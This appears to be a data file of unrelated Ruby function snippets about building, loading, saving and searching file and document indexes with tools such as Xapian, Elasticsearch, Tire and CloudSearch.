"def index_one(book_name)\n\n file = File.open( @dir_path+book_name, \"r\")\n\n puts \"Indexing #{book_name}\"\n file.each_line do |line|\n words = line.split\n words.each do |word|\n word = word.gsub(/[;.\"\"...,()?!*]+/i, \"\").downcase\n @connection.query(\"INSERT INTO #{@table_name} (word, count) VALUES ('#{@connection.escape(word)}', 1) ON DUPLICATE KEY UPDATE count=count+1\")\n\n end\n end\n\n puts \"Indexed #{book_name}\"\n end",
"def index_csv(data_path, db_path)\n db = Xapian::WritableDatabase.new(db_path, Xapian::DB_CREATE_OR_OPEN)\n term_generator = Xapian::TermGenerator.new\n term_generator.stemmer = Xapian::Stem.new('en')\n parse_csv_file(data_path).each do |row|\n doc = Xapian::Document.new\n term_generator.document = doc\n term_generator.index_text(row['TITLE'].to_s, 1, 'S')\n term_generator.index_text(row['DESCRIPTION'].to_s, 1, 'XD')\n term_generator.index_text(row['TITLE'].to_s)\n term_generator.increase_termpos\n term_generator.index_text(row['DESCRIPTION'].to_s)\n doc.data = row.to_h.to_json\n idterm = \"Q#{row['id_NUMBER']}\"\n doc.add_boolean_term(idterm)\n db.replace_document(idterm, doc)\n end\nend",
"def load_index_file(index_filename)\n # Look for an index. If it is found, load it and use it.\n return unless File.readable?(index_filename)\n Pocolog.info \"loading file info from #{index_filename}... \"\n index_data = File.open(index_filename).read\n file_info, stream_info =\n begin Marshal.load(index_data)\n rescue Exception => e\n if e.kind_of?(Interrupt)\n raise\n else\n raise InvalidIndex, \"cannot unmarshal index data\"\n end\n end\n\n if file_info.size != @io.size\n raise InvalidIndex, \"invalid index file: file set changed\"\n end\n coherent = file_info.enum_for(:each_with_index).all? do |(size, time), idx|\n size == File.size(@io[idx].path)\n end\n if !coherent\n raise InvalidIndex, \"invalid index file: file size is different\"\n end\n\n stream_info.each_with_index do |info, idx|\n\t\tif(!info.respond_to?(\"version\") || info.version != StreamInfo::STREAM_INFO_VERSION || !info.declaration_block)\n\t\t raise InvalidIndex, \"old index file found\"\n\t\tend\n\n @rio, pos = info.declaration_block\n if read_one_block(pos, @rio).type != STREAM_BLOCK\n raise InvalidIndex, \"invalid declaration_block reference in index\"\n end\n\n # Read the stream declaration block and then update the\n # info attribute of the stream object\n if !info.empty?\n @rio, pos = info.interval_io[0]\n if read_one_block(pos, @rio).type != DATA_BLOCK\n raise InvalidIndex, \"invalid start IO reference in index\"\n end\n\n if block_info.index != idx\n raise InvalidIndex, \"invalid interval_io: stream index mismatch for #{@streams[idx].name}. Expected #{idx}, got #{data_block_index}.\"\n end\n\n\t\t if !info.index.sane?\n raise InvalidIndex, \"index failed internal sanity check\"\n\t\t end\n\n @streams[idx].instance_variable_set(:@info, info)\n end\n end\n return @streams.compact\n\n rescue InvalidIndex => e\n Pocolog.warn \"invalid index file #{index_filename}\"\n\t nil\n end",
"def index(file) \n\n file = File.open(file, \"r\")\n tasks = file.readlines\n file.close\n\n return tasks\n\nend",
"def initialize(file, options = nil)\n @options = options || {}\n\t\t@index = {}\t\n\t\t@dbFile = file\n\t\tmakeIndex\n\tend",
"def construct_index\n @logger.fine('Constructing index...')\n File.open(@index_path, 'wb') do |f|\n write_int(@data_timestamp, f) # The timestamp value - used to determine if an index is valid.\n write_int(0, f) # The first row - always at offset 0.\n @data.each_line { write_int(@data.pos, f) } # The rest of the rows.\n end\n end",
"def parse(file)\n if @db.nil?\n return\n end\n\n begin\n @db.transaction\n @db.execute \"DROP INDEX IF EXISTS idx_markov_phrase\"\n IO.readlines(file).map {|l| insert(l)}\n @db.execute \"CREATE INDEX idx_markov_phrase ON markov(phrase)\"\n @db.commit\n rescue\n puts \"error reading #{file}\"\n @db.rollback\n end\n end",
"def index_file\n File.join(@directory, @host)\n end",
"def run(content, params={})\n markdown = Redcarpet::Markdown.new(Redcarpet::Render::HTML, autolink: true, space_after_headers: true)\n page_text = extract_text(markdown.render(item.raw_content))\n title = item[:title] || item.identifier\n file_name = item.identifier.to_s.gsub(/\\//,'_')\n puts \"Indexing page: #{@item.identifier} to #{@tmp_index}/#{file_name}.idx\"\n unless Dir.exists?(@tmp_index)\n Dir.mkdir(@tmp_index)\n end\n\n\n\n idx_file_name = \"#{@tmp_index}/#{file_name}.idx\"\n if File.exists?(idx_file_name)\n File.delete(idx_file_name)\n end\n File.open(idx_file_name,\"w+\") do |file|\n file.write({title: title, text: page_text, tags: \"api\", loc: @item.path }.to_json)\n end\n content\n end",
"def _index_document(opts = {})\n index_document(opts)\n end",
"def create_search_index\n Tire.index self.index_name\n end",
"def update_index\n index_files = []\n index_files << upload(\"specs.4.8.gz\", specs_index)\n log \"Uploaded all specs index\"\n index_files << upload(\"latest_specs.4.8.gz\", latest_index)\n log \"Uploaded latest specs index\"\n index_files << upload(\"prerelease_specs.4.8.gz\", prerelease_index)\n log \"Uploaded prerelease specs index\"\n\n index_files.each do |file|\n tuf_repo.replace_file(file, 'targets/unclaimed', 'targets')\n end\n\n # For now assume all files are unclaimed\n pending_files = tuf_pending_store.pending\n pending_files.each do |file|\n puts \"Adding file: #{file.path}\"\n tuf_repo.add_file(file, 'targets/unclaimed', 'targets')\n end\n tuf_repo.publish!\n tuf_pending_store.clear(pending_files)\n end",
"def create_index_file\n return [] unless File.exist? path\n\n RelatonBib.parse_yaml File.read(path, encoding: \"UTF-8\"), [Symbol]\n end",
"def parse_file\n n = 0\n begin\n @opener.open(@indexfile,\"r\") do |f|\n until f.eof?\n # read the entry\n entry = read_entry(f, n)\n n += 1\n end\n end\n return true\n rescue Errno::ENOENT\n return false\n end\n end",
"def read_index_file\n return if !File.exist?(path) || File.ctime(path).to_date < Date.today\n\n RelatonBib.parse_yaml File.read(path, encoding: \"UTF-8\"), [Symbol]\n end",
"def add_to_index(wiki, index, sha, files)\n end",
"def get_indexfile_with_line number\n IO.readlines(@indexfile)[number]\n end",
"def index(options = {})\n system(\"gem generate_index -d #{@path} > /dev/null\")\n # options = {:build_legacy => true, :build_modern => true}.merge(options)\n # indexer = indexer(options)\n # options[:update] ? indexer.update_index : indexer.generate_index\n end",
"def run(content, params={})\n # only process item that are changed since last regeneration\n if (!@last_indexed.nil? && @last_indexed > item.mtime)\n return content\n end\n\n puts \"Indexing page #{@item.identifier}\"\n\n while not @index.running?\n # wait for the indextank index to get ready\n sleep 0.5\n end\n\n page_text = extract_text(content)\n\n @index.document(@item.identifier).add({\n :text => page_text,\n :title => @item[:title] || item.identifier\n })\n puts 'Indexed ' << item.identifier\n\n @last_indexed = Time.now\n write_last_indexed\n\n content\n end",
"def process_index\n bindings = {\n :url => @definition.get_url,\n :name => @definition.get_name,\n :resources => @definition.resources,\n :description => @definition.get_description,\n :version => @definition.get_version\n }\n\n page = Calamum::DocGenerator.new(:index)\n page.save_template('index.html', bindings)\n end",
"def invertedIndex (folder)\n begin\n # Set doc number\n docNumber = 1\n # Iterate over each file in folder\n Find.find(folder) do |filename|\n begin\n # Ignore just folder name\n if !filename.eql? folder\n # Read in each file\n # If .docx\n if filename.include? \".docx\"\n file = Docx::Document.open(filename)\n file.each_paragraph do |line|\n processLine(docNumber, line)\n end\n # Assume text otherwise for now\n else\n file = File.open(filename)\n file_data = file.read\n # Read in file line by line\n file_data.each_line do |line|\n processLine(docNumber, line)\n end\n file.close\n end\n docNumber += 1\n end\n rescue\n puts \"Error in file name\"\n puts filename\n puts docNumber\n puts \"\\n\\n\"\n end\n \n end\n rescue\n puts \"Error in folder name\"\n exit 4\n end\n puts \"Inverted index initialized and created\"\nend",
"def build_index\n\n\t\t# Names the file based on date and time for uniqueness and ability to find which one you want later\n\t\tt = Time.now\n\t\t@file_time = t.strftime(\"%Y.%b.%d_%H.%M.%S\")\n\t\t@filename = \"quilt_pages/#{@needed_rows}x#{@needed_columns}_#{@file_time}.html\"\n\n\t\t# Store the quilt page template in a variable\n\t\tquilt_template = File.read \"templates/quilt_template.erb\"\n\t\t# Start a new ERB\n\t\terb_template = ERB.new quilt_template\n\t\t# Pull it all together and put info into one variable\n\t\tquilt_page = erb_template.result(binding)\n\n\t\t# Makes the directory for the quilt pages if there isn't one\n\t\tDir.mkdir(\"quilt_pages\") unless Dir.exists? \"quilt_pages\"\n\n\t\t# Opens the file and saves (actually writes) the quilt info\n\t\tFile.open(@filename, 'w') do |file|\n\t\t\tfile.puts quilt_page\n\t\tend\n\n\t\tsystem(\"open #{@filename}\")\n\tend",
"def load_script_from_index\n lines = File.readlines(index_filename)\n path = ENV['ALTERNATIVE_PATH'] || '.'\n lines.each do |filename|\n require(File.join(path, filename.chomp))\n end\n end",
"def index\n Index.new(root, paths, extensions, aliases)\n end",
"def execute_search(&on_result)\n Fast.public_send(search_method_name,\n expression,\n @files,\n parallel: parallel?,\n on_result: on_result)\n end",
"def construct_index\n end",
"def makeIndex()\n\t\tputs \"Indexing TlpDB...\" unless @options[:quiet]\n\n\t\tlineno = 1\n\t\tfor line in @dbFile do\n\t\t\tif line =~ /^name (.*)/ then\n\t\t\t\t@index[$1] = lineno\n\t\t\tend\n\t\t\tlineno = lineno.next\n\t\tend\n\n\t\tputs \"Done. #{@index.size} packages\" unless @options[:quiet]\n\tend",
"def build\n @logger.info(\"INDEXING\") { \"Building index of type #{@index_definition.name}\" }\n rdf_types = @index_definition.related_rdf_types\n number_of_documents = count_documents(rdf_types)\n @logger.info(\"INDEXING\") do\n %(Found #{number_of_documents} documents to index\n - matching type(s) #{rdf_types.inspect}\n - using allowed groups #{@search_index.allowed_groups}\"\n )\n end\n batches =\n if @max_batches && (@max_batches != 0)\n [@max_batches, number_of_documents / @batch_size].min\n else\n number_of_documents / @batch_size\n end\n batches = batches + 1\n @logger.info(\"INDEXING\") { \"Number of batches: #{batches}\" }\n\n Parallel.each(1..batches, in_threads: @number_of_threads) do |i|\n batch_start_time = Time.now\n @logger.info(\"INDEXING\") { \"Indexing batch #{i}/#{batches}\" }\n failed_documents = []\n @sparql_connection_pool.with_authorization(@search_index.allowed_groups) do |sparql_client|\n document_builder = MuSearch::DocumentBuilder.new(\n tika: @tika,\n sparql_client: sparql_client,\n attachment_path_base: @attachment_path_base,\n logger: @logger\n )\n document_uris = get_documents_for_batch(rdf_types, i)\n document_uris.each do |document_uri|\n @logger.debug(\"INDEXING\") { \"Indexing document #{document_uri} in batch #{i}\" }\n document = document_builder.build_document_for_index(\n uri: document_uri,\n index_definition: @index_definition\n )\n @elasticsearch.insert_document @search_index.name, document_uri, document\n rescue StandardError => e\n failed_documents << document_uri\n @logger.warn(\"INDEXING\") { \"Failed to index document #{document_uri} in batch #{i}\" }\n @logger.warn { e.full_message }\n end\n end\n @logger.info(\"INDEXING\") { \"Processed batch #{i}/#{batches} in #{(Time.now - batch_start_time).round} seconds.\" }\n if failed_documents.length > 0\n @logger.warn(\"INDEXING\") { \"#{failed_documents.length} documents failed to index in batch #{i}.\" }\n @logger.debug(\"INDEXING\") { \"Failed documents: #{failed_documents}\" }\n end\n end\n end",
"def build_index\n reset @store.all_files.sort, @store.all_classes_and_modules.sort\n\n index_classes\n index_methods\n index_pages\n\n { :index => @index }\n end",
"def perform(filepath)\n\n end",
"def create\n @indexed_file = IndexedFile.new(params[:indexed_file])\n\n respond_to do |format|\n if @indexed_file.save\n format.html { redirect_to @indexed_file, notice: 'Indexed file was successfully created.' }\n format.json { render json: @indexed_file, status: :created, location: @indexed_file }\n else\n format.html { render action: \"new\" }\n format.json { render json: @indexed_file.errors, status: :unprocessable_entity }\n end\n end\n end",
"def reindex(id_list_file, clean_index)\n reindex_list(id_list_file, clean_index)\n rescue ArgumentError => e\n raise e\n rescue StandardError => e\n Rails.logger.error 'Execution interrupted by unexpected error'\n Rails.logger.error [e.class.to_s, e.message, *e.backtrace].join($RS)\n end",
"def index(index)\n execute(:index, index)\n end",
"def index ; @index ; end",
"def index\r\n build_index unless @index\r\n @index\r\n end",
"def save\n File.open(@index_file, 'wb') do |f|\n Marshal.dump([@terms, @index], f)\n end\n end",
"def add_to_index_files(idx, name)\n year = NvdFileSystem::year_from_name(name)\n\n path=\"#{@nvdfs.root_path}/index\"\n Dir.mkdir path unless Dir.exist? path\n path += \"/#{year}\"\n Dir.mkdir path unless Dir.exist? path\n path += \"/#{idx}\"\n Dir.mkdir path unless Dir.exist? path\n path += \"/#{name}\"\n\n begin\n File.open(path,\"wb\") {|f| f.write(\"\") }\n rescue Exception => ex\n str=\"unable to create index file #{path}\"\n puts str\n end\n\n end",
"def open_index(o={})\n @clf = cache_data('clf', Searcher.load_features())\n @con_weights = cache_data('con_weights', Searcher.load_weights(CON_FEATURES, 'con', Conf.weight_con))\n @doc_weights = cache_data('doc_weights', Searcher.load_weights(DOC_FEATURES, 'doc', Conf.weight_doc))\n end",
"def save\n File.open(@index_file, 'wb') do |f|\n f.puts Marshal::dump([@terms, @index])\n end\n end",
"def build\n # Note: @index_definitions will only contain multiple elements in case of a composite type.\n @index_definitions.each do |type_def|\n @logger.info(\"INDEXING\") { \"Building index of type #{type_def[\"type\"]}\" }\n rdf_type = type_def[\"rdf_type\"]\n number_of_documents = count_documents(rdf_type)\n @logger.info(\"INDEXING\") { \"Found #{number_of_documents} documents to index of type #{rdf_type} with allowed groups #{@search_index.allowed_groups}\" }\n batches =\n if @max_batches && (@max_batches != 0)\n [@max_batches, number_of_documents / @batch_size].min\n else\n number_of_documents / @batch_size\n end\n batches = batches + 1\n @logger.info(\"INDEXING\") { \"Number of batches: #{batches}\" }\n\n Parallel.each(1..batches, in_threads: @number_of_threads) do |i|\n batch_start_time = Time.now\n @logger.info(\"INDEXING\") { \"Indexing batch #{i}/#{batches}\" }\n failed_documents = []\n\n @sparql_connection_pool.with_authorization(@search_index.allowed_groups) do |sparql_client|\n document_builder = MuSearch::DocumentBuilder.new(\n tika: @tika,\n sparql_client: sparql_client,\n attachment_path_base: @attachment_path_base,\n logger: @logger\n )\n document_uris = get_documents_for_batch rdf_type, i\n document_uris.each do |document_uri|\n @logger.debug(\"INDEXING\") { \"Indexing document #{document_uri} in batch #{i}\" }\n document = document_builder.fetch_document_to_index(\n uri: document_uri,\n properties: type_def[\"properties\"])\n @elasticsearch.insert_document @search_index.name, document_uri, document\n rescue StandardError => e\n failed_documents << document_uri\n @logger.warn(\"INDEXING\") { \"Failed to index document #{document_uri} in batch #{i}\" }\n @logger.warn { e.full_message }\n end\n end\n @logger.info(\"INDEXING\") { \"Processed batch #{i}/#{batches} in #{(Time.now - batch_start_time).round} seconds.\" }\n if failed_documents.length > 0\n @logger.warn(\"INDEXING\") { \"#{failed_documents.length} documents failed to index in batch #{i}.\" }\n @logger.debug(\"INDEXING\") { \"Failed documents: #{failed_documents}\" }\n end\n end\n end\n end",
"def initialize(index_filename, number_of_docs)\n\n\t\tif File.exists?(index_filename)\n\t\t\tFile.open(index_filename, \"rb\") do |file|\n\t\t\t\t@index = Marshal.load(file.read)\n\t\t\tend\n\t\telse\n\t\t\tputs \"Sorry, this file doesn't exist. \\n Perhaps you haven't run 'invert.rb' yet?\"\n\t\t\texit\n\t\tend\n\n\t\t#Collects information on the document vector\n\t\t@vdocs = Hash.new\n\t\tt_i = 0 #term\n\n\t\t@index.each do |term, data|\n\t\t\tdata.postings.each do |doc_id, doc_data|\n\n\t\t\t\tidf = Math.log(number_of_docs/data.term_doc_freq)\n\t\t\t\tweight = (1 + Math.log(doc_data.freq)) * idf\n\n\t\t\t\tif @vdocs[doc_id] == nil\n\t\t\t\t\t@vdocs[doc_id] = VectorData.new\n\t\t\t\tend\n\n\t\t\t\t@vdocs[doc_id].norm += weight * weight\n\t\t\t\t@vdocs[doc_id].t_id.push(t_i)\n\t\t\t\t@vdocs[doc_id].w.push(weight)\n\t\t\tend\n\n\t\t\tt_i += 1\n\t\tend\n\n\t\t@vdocs.each_value do |v|\n\t\t\tv.norm = Math.sqrt(v.norm)\n\t\tend\n\n\t\t@vdocs = Hash[@vdocs.sort_by { |k,v| k}]\n\tend",
"def save_index\n @index.compute_digest(@data_file)\n @index.to_disk(@index_file)\n end",
"def analyze_file (file_name)\n @analyzers = []\n # this will get an instance of LineAnalyzer for each line of your data file into an array\n File.foreach(file_name).with_index do |line, line_number|\n # << is a common shorthand to append an item to an array\n @analyzers << LineAnalyzer.new(line, line_number + 1) # add one because line_number will start at 0\n end\n @analyzers # so we can examine the return\n end",
"def create_main_index(data)\n create_partials data[:sub_file], data\n data[:header] = read_file(get_header_path(data[:sub_file]))\n data[:footer] = read_file(get_footer_path(data[:sub_file]))\n data[:stylesheetloc] = main_file_stylesheet_locs\n write_data data, 'data'\n system 'erb _templates/_index.html.erb > index.html'\n end",
"def create_search_index\n #Notice the assoction on article.user.id\n TaggyMcFaggy.create_index :attribute_namespace => :article_text,\n :document_id => id,\n :words => text_content,\n :association => user.id\n \n end",
"def generate_index(basename)\n debug_msg \"Generating index #{basename}.html\"\n template_file = @template_dir + \"#{basename}.html.erb\"\n outfile = @output_dir + \"#{basename}.html\"\n render_template(template_file, binding(), outfile)\n end",
"def search(index, options = {}, &block)\n searcher = Tire::Search::Search.new(index, &block)\n options = options.dup\n if index.include?('/')\n index, type = index.split('/', 2)\n options[:type] = type\n end\n @indices << index\n @parts << [index, options, searcher]\n end",
"def indexed?\n @index_file and File.exist?(@index_file)\n end",
"def create_search_index\n Tire.index Person.index_name do\n create(\n settings: {\n analysis: {\n filter: {\n name_ngrams: {\n 'side' => 'front',\n 'max_gram' => 10,\n 'min_gram' => 1,\n 'type' => 'edgeNGram'\n }\n },\n analyzer: {\n full_name: {\n 'filter' => %w(standard lowercase asciifolding),\n 'type' => 'custom',\n 'tokenizer' => 'standard'\n },\n partial_name: {\n 'filter' => %w(standard lowercase asciifolding name_ngrams),\n 'type' => 'custom',\n 'tokenizer' => 'standard'\n },\n keyword: {\n 'filter' => %w(lowercase),\n 'tokenizer' => 'keyword'\n }\n }\n },\n store: {\n type: Rails.env.test? ? :memory : :niofs\n }\n },\n mappings: {\n person: {\n properties: {\n first_name: {\n fields: {\n partial: {\n search_analyzer: 'full_name',\n index_analyzer: 'partial_name',\n type: 'string'\n },\n first_name: {\n type: 'string',\n analyzer: 'full_name'\n }\n },\n type: 'multi_field'\n },\n last_name: {\n fields: {\n partial: {\n search_analyzer: 'full_name',\n index_analyzer: 'partial_name',\n type: 'string'\n },\n last_name: {\n type: 'string',\n analyzer: 'full_name'\n }\n },\n type: 'multi_field'\n },\n initials: {\n type: 'string',\n analyzer: 'simple'\n },\n profession: {\n type: 'string',\n analyzer: 'keyword'\n },\n email: {\n type: 'string',\n analyzer: 'simple'\n },\n login: {\n type: 'string',\n analyzer: 'simple'\n },\n year_entrance: {\n type: 'date',\n format: 'YYYY'\n },\n year_out: {\n type: 'date',\n format: 'YYYY'\n }\n }\n }\n }\n )\n end\n end",
"def indexItem(itemID, batch, nailgun)\n\n # Grab the main metadata file\n metaPath = arkToFile(itemID, \"meta/base.meta.xml\")\n if !File.exist?(metaPath) || File.size(metaPath) < 50\n puts \"Warning: skipping #{itemID} due to missing or truncated meta.xml\"\n $nSkipped += 1\n return\n end\n rawMeta = fileToXML(metaPath)\n rawMetaXML = rawMeta.to_xml(indent: 3)\n rawMeta.remove_namespaces!\n rawMeta = rawMeta.root\n\n isPending = metaPath.include?(\"/next/\")\n\n existingItem = Item[itemID]\n\n normalize = nil\n if rawMeta.name =~ /^DISS_submission/ ||\n (rawMeta.name == \"mets\" && rawMeta.attr(\"PROFILE\") == \"http://www.loc.gov/mets/profiles/00000026.html\")\n normalize = \"ETD\"\n elsif rawMeta.name == \"mets\"\n normalize = \"BioMed\"\n elsif rawMeta.name == \"Publisher\"\n normalize = \"Springer\"\n end\n\n Thread.current[:name] = \"index thread: #{itemID} #{sprintf(\"%-8s\", normalize ? normalize : \"UCIngest\")}\"\n\n if normalize\n dbItem, attrs, authors, contribs, units, issue, section, suppSummaryTypes =\n processWithNormalizer(normalize, itemID, metaPath, nailgun, isPending)\n else\n dbItem, attrs, authors, contribs, units, issue, section, suppSummaryTypes =\n parseUCIngest(itemID, rawMeta, \"UCIngest\", isPending)\n end\n\n text = $noCloudSearchMode ? \"\" : grabText(itemID, dbItem.content_type)\n \n # Create JSON for the full text index\n authsAndContribs = authors.map { |auth| auth[:name][0,1024] } + contribs.map { |c| c[:name][0,1024] }\n idxItem = {\n type: \"add\", # in CloudSearch land this means \"add or update\"\n id: itemID,\n fields: {\n title: dbItem[:title] ? cleanTitle(dbItem[:title]) : \"\",\n authors: authsAndContribs.length > 1000 ? authsAndContribs[0,1000] : authsAndContribs,\n abstract: attrs[:abstract] || \"\",\n type_of_work: dbItem[:genre],\n disciplines: attrs[:disciplines] ? attrs[:disciplines] : [\"\"], # only the numeric parts\n peer_reviewed: attrs[:is_peer_reviewed] ? 1 : 0,\n pub_date: dbItem[:published].to_date.iso8601 + \"T00:00:00Z\",\n pub_year: dbItem[:published].year,\n rights: rightsURLToCode(dbItem[:rights]),\n sort_author: (authors[0] || {name:\"\"})[:name].gsub(/[^\\w ]/, '')[0,1024].downcase,\n keywords: attrs[:keywords] ? attrs[:keywords] : [\"\"],\n is_info: 0\n }\n }\n\n # Determine campus(es), department(s), and journal(s) by tracing the unit connnections.\n firstCampus = addIdxUnits(idxItem, units)\n\n # Use the first campus and various other attributes to make an OA policy association\n dbItem[:oa_policy] = oaPolicyAssoc(firstCampus, units, dbItem, attrs[:pub_status])\n\n # Summary of supplemental file types\n suppSummaryTypes.empty? or idxItem[:fields][:supp_file_types] = suppSummaryTypes.to_a\n\n # Limit text based on size of other fields (so, 1000 authors will mean less text).\n # We have to stay under the overall limit for a CloudSearch record. This problem is\n # a little tricky, since conversion to JSON introduces additional characters, and\n # it's hard to predict how many. So we just use a binary search.\n idxItem[:fields][:text] = text\n if JSON.generate(idxItem).bytesize > MAX_TEXT_SIZE\n idxItem[:fields][:text] = nil\n baseSize = JSON.generate(idxItem).bytesize\n toCut = (0..text.size).bsearch { |cut|\n JSON.generate({text: text[0, text.size - cut]}).bytesize + baseSize < MAX_TEXT_SIZE\n }\n (toCut==0 || toCut.nil?) 
and raise(\"Internal error: have to cut something, but toCut=#{toCut.inspect}\")\n #puts \"Note: Keeping only #{text.size - toCut} of #{text.size} text chars.\"\n idxItem[:fields][:text] = text[0, text.size - toCut]\n end\n\n # Make sure withdrawn items get deleted from the index. Also make sure pending items\n # aren't in the index.\n if attrs[:suppress_content] || dbItem[:status] == \"pending\"\n idxItem = {\n type: \"delete\",\n id: itemID\n }\n end\n\n dbAuthors = authors.each_with_index.map { |data, idx|\n ItemAuthor.new { |auth|\n auth[:item_id] = itemID\n auth[:attrs] = JSON.generate(data)\n auth[:ordering] = idx\n }\n }\n\n roleCounts = Hash.new { |h,k| h[k] = 0 }\n dbContribs = contribs.each_with_index.map { |data, _idx|\n ItemContrib.new { |contrib|\n contrib[:item_id] = itemID\n contrib[:role] = data[:role]\n data.delete(:role)\n contrib[:attrs] = JSON.generate(data)\n contrib[:ordering] = (roleCounts[contrib[:role]] += 1)\n }\n }\n\n # For convenient spelunking, record the archival metadata in the db\n dbArchiveMeta = collectArchiveMeta(itemID, rawMetaXML)\n\n # Calculate digests of the index data and database records\n idxData = JSON.generate(idxItem)\n idxDigest = Digest::MD5.base64digest(idxData)\n dbCombined = {\n dbItem: dbItem.to_hash,\n dbAuthors: dbAuthors.map { |authRecord| authRecord.to_hash },\n dbIssue: issue ? issue.to_hash : nil,\n dbSection: section ? section.to_hash : nil,\n units: units,\n archiveMeta: dbArchiveMeta.to_hash\n }\n dbContribs.empty? or dbCombined[:dbContribs] = dbContribs.map { |record| record.to_hash }\n dataDigest = Digest::MD5.base64digest(JSON.generate(dbCombined))\n\n # Add time-varying things into the database item now that we've generated a stable digest.\n timestamp = $preindexMode ? nil : DateTime.now\n dbItem[:last_indexed] = timestamp\n dbItem[:index_digest] = $noCloudSearchMode ? (existingItem && existingItem[:index_digest]) : idxDigest\n dbItem[:data_digest] = dataDigest\n\n dbDataBlock = { dbItem: dbItem, dbAuthors: dbAuthors, dbContribs: dbContribs,\n dbIssue: issue, dbSection: section, units: units,\n dbArchiveMeta: dbArchiveMeta }\n\n # Single-item debug\n if $testMode\n fooData = dbCombined.clone\n fooData.delete(:archiveMeta)\n pp fooData\n fooData = idxItem.clone\n fooData[:fields] and fooData[:fields][:text] and fooData[:fields].delete(:text)\n pp fooData\n exit 1\n end\n\n # If nothing has changed, skip the work of updating this record.\n if existingItem && !$forceMode && ($preindexMode || existingItem[:index_digest] == idxDigest)\n\n # If only the database portion changed, we can safely skip the CloudSearch re-indxing\n if existingItem[:data_digest] != dataDigest\n puts \"#{$forceMode ? \"Forced\" : \"Changed\"} item. (database change only, search data unchanged)\"\n $dbMutex.synchronize {\n DB.transaction { updateDbItem(dbDataBlock) }\n }\n $nProcessed += 1\n return\n end\n\n # Nothing changed; just update the timestamp.\n puts \"Unchanged item.\"\n existingItem.last_indexed = timestamp\n existingItem.save\n $nUnchanged += 1\n return\n end\n\n puts \"#{existingItem ? ($forceMode ? 'Forced' : 'Changed') : 'New'} item.#{attrs[:suppress_content] ? 
\" (suppressed content)\" : \"\"}\"\n\n if $noCloudSearchMode\n $dbMutex.synchronize {\n DB.transaction { updateDbItem(dbDataBlock) }\n }\n $nProcessed += 1\n return\n end\n\n # Make doubly sure the logic above didn't generate a record that's too big.\n if idxData.bytesize >= 1024*1024\n puts \"idxData=\\n#{idxData}\\n\\nInternal error: generated record that's too big.\"\n exit 1\n end\n\n # If this item won't fit in the current batch, send the current batch off and clear it.\n if batch[:idxDataSize] + idxData.bytesize > MAX_BATCH_SIZE || batch[:items].length > MAX_BATCH_ITEMS\n #puts \"Prepared batch: nItems=#{batch[:items].length} size=#{batch[:idxDataSize]} \"\n batch[:items].empty? or $batchQueue << batch.clone\n emptyBatch(batch)\n end\n\n # Now add this item to the batch\n batch[:items].empty? or batch[:idxData] << \",\\n\" # Separator between records\n batch[:idxData] << idxData\n batch[:idxDataSize] += idxData.bytesize\n batch[:items] << dbDataBlock\n #puts \"current batch size: #{batch[:idxDataSize]}\"\nend",
"def search_index(filename, term)\r\n puts \"Searching for the term: \" + term\r\n CSV.foreach(filename, :headers => true) do |row|\r\n \r\n begin\r\n doc = Nokogiri::HTML(open(row[0]))\r\n pagetext = doc.at('body').inner_text\r\n # Pretend that all words we care about contain only a-z, 0-9, or underscores\r\n if pagetext.scan(/\\w+/).include?(term) then puts \"Result: \" + row[0] else puts row[0] + \" does not include \" + term end\r\n rescue RuntimeError\r\n #puts \"Runtime error caught\"\r\n rescue OpenURI::HTTPError\r\n #puts \"OpenURI error caught\"\r\n rescue OpenURI::HTTPRedirect \r\n #puts \"OpenURI redir error caught\"\r\n end\r\n end\r\n \r\nend",
"def context(filename, search_text, host)\n return execute_search([filename], search_text, true, host)\n end",
"def croucher_index_file\n nil\n end",
"def index\n @@semaphore.synchronize {\n inner_index()\n }\n end",
"def create_index(word)\n create_index1(word)\n end",
"def analyze_file\n line_number = 0\n File.foreach('test.txt') do |line|\n @analyzers << LineAnalyzer.new(line.chomp, line_number += 1)\n end\n end",
"def generate\n debug_msg \"Generating JSON index\"\n\n debug_msg \" writing search index to %s\" % SEARCH_INDEX_FILE\n data = build_index\n\n return if @options.dry_run\n\n out_dir = @base_dir + @options.op_dir\n index_file = out_dir + SEARCH_INDEX_FILE\n\n FileUtils.mkdir_p index_file.dirname, :verbose => $DEBUG_RDOC\n\n index_file.open 'w', 0644 do |io|\n io.set_encoding Encoding::UTF_8\n io.write 'var search_data = '\n\n JSON.dump data, io, 0\n end\n unless ENV['SOURCE_DATE_EPOCH'].nil?\n index_file.utime index_file.atime, Time.at(ENV['SOURCE_DATE_EPOCH'].to_i).gmtime\n end\n\n Dir.chdir @template_dir do\n Dir['**/*.js'].each do |source|\n dest = File.join out_dir, source\n\n FileUtils.install source, dest, :mode => 0644, :preserve => true, :verbose => $DEBUG_RDOC\n end\n end\n end",
"def add(file)\n # add file to object db\n return false if !File.exists?(file)\n return false if !File.file?(file)\n \n sha = get_raw_repo.put_raw_object(File.read(file), 'blob')\n \n # add it to the index\n @git_index.add(file, sha)\n end",
"def load_index_in(source, words, remaining_words, priority)\n return unless @index_file_name\n index_source = source.relative_child(@index_file_name)\n load_relevant_path(index_source, words, remaining_words, priority) if index_source\n end",
"def build_index(&key_builder)\n hashes = Hash.new { |h, k| h[k] = [] }\n keys = {}\n pos = 0\n\n @logger.fine('Generating hash...')\n @data.seek(0)\n @data.each_line do |line|\n key = key_builder.call(line)\n raise IndexError.new(\"Key '#{key}' already mapped\") if keys.has_key?(key)\n\n keys[key] = true\n hash = get_hash(key)\n hashes[hash] << [key, pos]\n pos = @data.pos\n end\n\n # Generate the index files now.\n @logger.fine('Constructing index...')\n FileUtils.rm_r(@index_folder) if File.exist?(@index_folder)\n FileUtils.mkdir(@index_folder)\n hashes.each_pair do |hash, data|\n data = data.sort { |d1, d2| d1[0] <=> d2[0] }\n path = File.join(@index_folder, \"#{hash}.index\")\n File.open(path, 'wb') do |f|\n write_int(@data_timestamp, f) # The timestamp for this index file.\n data.each { |key, offset| f.write([key, offset].pack('Z*L')) } # The keys mapped to this index file.\n end\n end\n\n nil\n end",
"def from_indexes(file_index, rank_index)\n return nil unless valid_indexes?(file_index, rank_index)\n new(files[file_index], ranks[rank_index])\n end",
